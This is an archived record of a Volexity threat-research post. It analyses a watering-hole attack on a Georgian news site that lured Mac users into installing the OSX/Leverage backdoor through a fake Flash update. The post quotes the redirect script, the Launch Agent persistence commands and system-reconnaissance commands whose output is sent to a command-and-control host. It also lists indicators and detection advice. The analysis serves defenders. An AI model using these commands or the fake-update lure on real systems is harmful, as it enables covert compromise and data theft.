{
	"id": "29f716cf-9077-4b47-8074-2084f7c3fb55",
	"created_at": "2026-04-06T00:19:15.969459Z",
	"updated_at": "2026-04-10T03:21:47.612066Z",
	"deleted_at": null,
	"sha1_hash": "55dcf6af3329f726ccca2d46c81ab9142464cdc5",
	"title": "Real News, Fake Flash: Mac OS X Users Targeted",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 527936,
	"plain_text": "Real News, Fake Flash: Mac OS X Users Targeted\r\nBy mindgrub\r\nPublished: 2017-07-24 · Archived: 2026-04-05 18:35:00 UTC\r\nVolexity recently identified a breach of the website of a well-regarded media outlet in the country of Georgia. As\r\npart of this breach, the media organization’s website was being leveraged as a component of a malware campaign\r\ntargeting select visitors. The news organization provides reporting on its website in English, Georgian, and\r\nRussian. However, only the Georgian language portion of the website was impacted and used in an effort to\r\ndistribute malware. The targets were then further narrowed to those that were running the Mac OS X operating\r\nsystem, had not previously visited the website, and had specific browser versions. The attackers accomplished\r\nmuch of this with JavaScript they placed on the media organization’s website.\r\nThe following JavaScript code was observed on the index page of the Georgian language portion of the website.\r\nThe attackers appear to have implemented multiple checks to make sure they limited the targeting and frequency\r\nof the attacks against visitors to the website. In particular, the JavaScript specifically checks if the visitor’s User-Agent is associated with a Mac and that the browser is not Google Chrome. If these conditions pass, cookies for\r\nthe website are pulled into a variable and inspected. In particular, a cookie named site is examined to see if it holds\r\nthe value RNDsstr2Template2 or RNDsstrTemplate. If the cookie is present with either value, it indicates that the visitor has\r\npreviously visited the website and evaluated the attacker’s JavaScript code. If this is the case, the exploitation\r\nchain will end. 
The code will then extend the expiration of the site cookie with RNDsstr2Template2 as its value.\r\nHowever, if the initial criteria passed and the site cookie is not present or at least does not contain the value\r\nRNDsstr2Template2 or RNDsstrTemplate, the JavaScript will then create the site cookie with the value\r\nRNDsstrTemplate and then call the function prepareFrame().\r\nhttps://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/\r\nPage 1 of 7\n\nThe prepareFrame() function effectively loads an iframe from the following attacker-controlled URL:\r\nhttp://updatesec.webredirect[.]org/flash/index.php\r\nDuring most of Volexity’s test cases, this page will only return 2 bytes back to the request. However, when\r\nrequesting the URL with a User-Agent indicative of a Mac system using Safari, Volexity was able to intermittently\r\nget the website to return follow-on JavaScript. Despite the initial check ensuring the visitor is on a Mac and\r\nnot running Google Chrome, it appears server-side code performs further checks before attempting to actually\r\ntarget the user. Volexity observed the following code being returned from the server upon meeting all targeting\r\nconditions:\r\n\u003cscript type='text/javascript'\u003e\r\nwindow.parent.location.href= 'http://updatesec.webredirect[.]org/flashplayer/index.html';\r\n\u003c/script\u003e\r\nThis script results in the user being brought to a page titled “Flash Player Critical Update” that was designed to\r\nappear as though it was a legitimate Adobe website. This page in turn loaded an iframe from the following URL:\r\nhttp://updatesec.webredirect[.]org/flash.html\r\nThe code from this URL appears to have been generated from Metasploit with a module for the Safari User-Assisted Download and Run Attack. 
The Metasploit website describes the attack and the module as follows:\r\nThis module abuses some Safari functionality to force the download of a zipped .app OSX application\r\ncontaining our payload. The app is then invoked using a custom URL scheme. At this point, the user is\r\npresented with Gatekeeper’s prompt: “APP_NAME” is an application downloaded from the internet.\r\nAre you sure you want to open it? If the user clicks “Open”, the app and its payload are executed. If the\r\nuser has the “Only allow applications downloaded from Mac App Store and identified developers” (on\r\nby default on OS 10.8+), the user will see an error dialog containing “can’t be opened because it is from\r\nan unidentified developer.” To work around this issue, you will need to manually build and sign an OSX\r\napp containing your payload with a custom URL handler called “openurl”. You can put newlines and\r\nunicode in your APP_NAME, although you must be careful not to create a prompt that is too tall, or the\r\nuser will not be able to click the buttons, and will have to either logout or kill the CoreServicesUIAgent\r\nprocess.\r\nThe code in this case would attempt to download and install malware from the following URL:\r\nhttp://updatesec.webredirect[.]org/GetFlashPlayer.zip\r\nThe User-Assisted Download and Run would then result in the creation of the file (directory)\r\nGetFlashPlayer.app and its attempted launch from the user’s Downloads directory. 
Per the description above, OS\r\nX will then prompt the user if they are sure they wish to run the file since it was downloaded from the Internet.\r\nIf the user selects “Open” or otherwise later launches it from their Downloads folder, the malware will be launched\r\nand install a copy of itself at the following path:\r\n/Users/\u003cusername\u003e/Library/Safari/GetFlashPlayer.app/\r\nThe folder structure of the malware and its files is shown below.\r\nThe malware maintains persistence through a Launch Agent by executing the following commands:\r\nmkdir ~/Library/LaunchAgents\necho '?xml version=\"1.0\" encoding=\"UTF-8\"?\u003eRunAtLoadKeepAliveLabelcom.GetFlashPlayerProgramArguments/Users//Library/Safari/GetFlashPlayer.app/Contents/MacOS/GetFlashPlayer' \u003e ~/Library/LaunchAgents/com.GetFlashPlayer.plist\nAs can be seen, the malware is writing a plist file named com.GetFlashPlayer.plist into the victim user’s\nLaunchAgents directory.\nThe RunAtLoad and KeepAlive keys ensure that the malware will gain persistence and keep running.\nUpon execution, the malware will also use the open command to launch the URL\nhttps://get.adobe.com/flashplayer/ in a browser window. This new browser activity is meant to trick the user into\nthinking the Adobe Flash Update application is legitimate. The malware then immediately begins to beacon to\ndownloadarchives.servehttp[.]com (213.200.14.138) on TCP port 7777. If a successful connection is made, the\noutput from the following commands is sent:\n1. logname\n2. ioreg -l | grep \"product-name\" | awk -F\\\" '{print $4}'\n3. sw_vers | awk -F\\':t' '{print $2}' | paste -d ' ' - - -;\n4. sysctl -n hw.memsize | awk '{print $0/1073741824\" GB RAM\"}';\n5. df -hl | grep 'disk0s2' | awk '{print $4\"/\"$2\" free (\"$5\" used)\"}'\n6. 
ioreg -l | grep \"IOPlatformSerialNumber\" | awk -F\\\" '{print $4}'\nThe information gathered by these commands includes the following:\nCommand Information Gathered\n1 The account name of the logged-in user\n2 The name and version of the hardware (or virtual machine) running the malware. For example,\n“MacBookAir6,2” or “VmWare9,1”.\n3 The installed version of OS X\n4 The amount, in gigabytes, of RAM installed\n5 The amount of disk space available and used\n6 The system’s serial number (unique to the hardware or virtual machine)\nThe backdoor is very noisy and will attempt to communicate with the command and control server every second\nuntil a connection is established.\nMalware File Information\nThe malware used by the attackers appears to be a newer version of what has previously been dubbed\r\nOSX/Leverage.A and described in public blogs by Intego and AlienVault. It is written in Real Basic and beacons\r\nback to the attackers once per second until a connection is established. Unlike the earlier version of the malware,\r\nthis new version does not limit itself to a predefined set of commands and instead allows an unrestricted command\r\nshell capability back into an infected system. 
Details of the core malware files are provided below.\r\nFile Hashes\r\nFilename: GetFlashPlayer.zip\r\nFile size: 1378073 bytes\r\nMD5 hash: 6597ffd7d1d241b1bf776bc7e1e3f840\r\nSHA1 hash: 2810d554b2e9e14551cef7293e5240b058fb78c3\r\nNotes: ZIP file containing the OSX/Leverage.A GetFlashPlayer.app application/directory.\r\nFilename: GetFlashPlayer\r\nFile size: 2131776 bytes\r\nMD5 hash: 28064805242b3aa9c138061d6c18e7f5\r\nSHA1 hash: 2441e2e9f68b4110218e1fcdc2cfce864b96e2da\r\nNotes: Signed OSX/Leverage.A binary masquerading as a legitimate file from Adobe\r\nDigitally Signed\r\nThis instance of the OSX/Leverage backdoor had been signed with a code signing certificate that was issued to an\r\nApple Developer. Additional notes of interest related to the compilation time of the malware and the developer name\r\nassociated with the code signing certificate are shown below from the codesign utility:\r\n$ codesign -dvv GetFlashPlayer.app/\r\nExecutable=/Users/volexity/malware/GetFlashPlayer.app/Contents/MacOS/GetFlashPlayer\r\nIdentifier=com.papandopulo.alex\r\nFormat=app bundle with Mach-O thin (i386)\r\nCodeDirectory v=20200 size=10464 flags=0x0(none) hashes=516+3 location=embedded\r\nSignature size=8532\r\nAuthority=Developer ID Application: aleks papandopulo (SN6EU36WE9)\r\nAuthority=Developer ID Certification Authority\r\nAuthority=Apple Root CA\r\nTimestamp=Feb 5, 2016, 06:25:25\r\nInfo.plist entries=16\r\nTeamIdentifier=SN6EU36WE9\r\nSealed Resources version=2 rules=12 files=4\r\nInternal requirements count=1 size=180\r\nDetection\r\nDetection of the malware can be achieved at both the host and network level. On the host, systems can be\r\nexamined for the presence of the GetFlashPlayer application and/or Launch Agent under a user’s profile.\r\nAdditionally, any files found to be signed with the certificate described above should be considered to be\r\nmalicious. 
At the network level, connections destined for TCP port 7777 should be scrutinized and examined, as\r\nthis is a non-standard port for typical external communication. The following Emerging Threats rule, found under\r\ntrojan.rules, will also detect the network beacons:\r\n2017525 – ET TROJAN OSX/Leverage.A Checkin\r\nNetwork Indicators\r\nDNS Names\r\nHostname IP Address\r\nupdatesec.webredirect[.]org 45.77.53.146\r\ndownloadarchives.servehttp[.]com 213.200.14.138\r\nIP Addresses\r\nVolexity was also able to find ties between the updatesec.webredirect[.]org exploitation and malware delivery\r\nserver and the IP address 176.9.192.223. Volexity believes this IP is likely used for similar purposes and is directly\r\nrelated to the threat activity described in this blog.\r\nIP Address ASN Information\r\n45.77.53.146 20473 | 45.77.52.0/22 | AS-CHOOPA | US | Choopa, LLC, US\r\n213.200.14.138 16010 | 213.200.0.0/19 | MAGTICOMAS, | GE | GE\r\n176.9.192.223 24940 | 176.9.0.0/16 | HETZNER | DE | AS, DE\r\n[Un]Related Activity\r\nIn a final interesting twist, while writing this blog, Volexity noted that the IP address for the hostname\r\nupdatesec.webredirect[.]org was updated to resolve to the Lithuanian IP address 185.28.22.22. This IP address\r\ndoes not appear to be responding on port 80, so no content would be served to visitors. However, it should be\r\nnoted that this IP address is listed as a command and control server in the Stantinko report that was just released\r\nby ESET last week. 
Volexity is not aware of any ties between this threat activity and those behind Stantinko.\r\nSource: https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/"
	],
	"report_names": [
		"real-news-fake-flash-mac-os-x-users-targeted"
	],
	"threat_actors": [],
	"ts_created_at": 1775434755,
	"ts_updated_at": 1775791307,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55dcf6af3329f726ccca2d46c81ab9142464cdc5.pdf",
		"text": "https://archive.orkl.eu/55dcf6af3329f726ccca2d46c81ab9142464cdc5.txt",
		"img": "https://archive.orkl.eu/55dcf6af3329f726ccca2d46c81ab9142464cdc5.jpg"
	}
}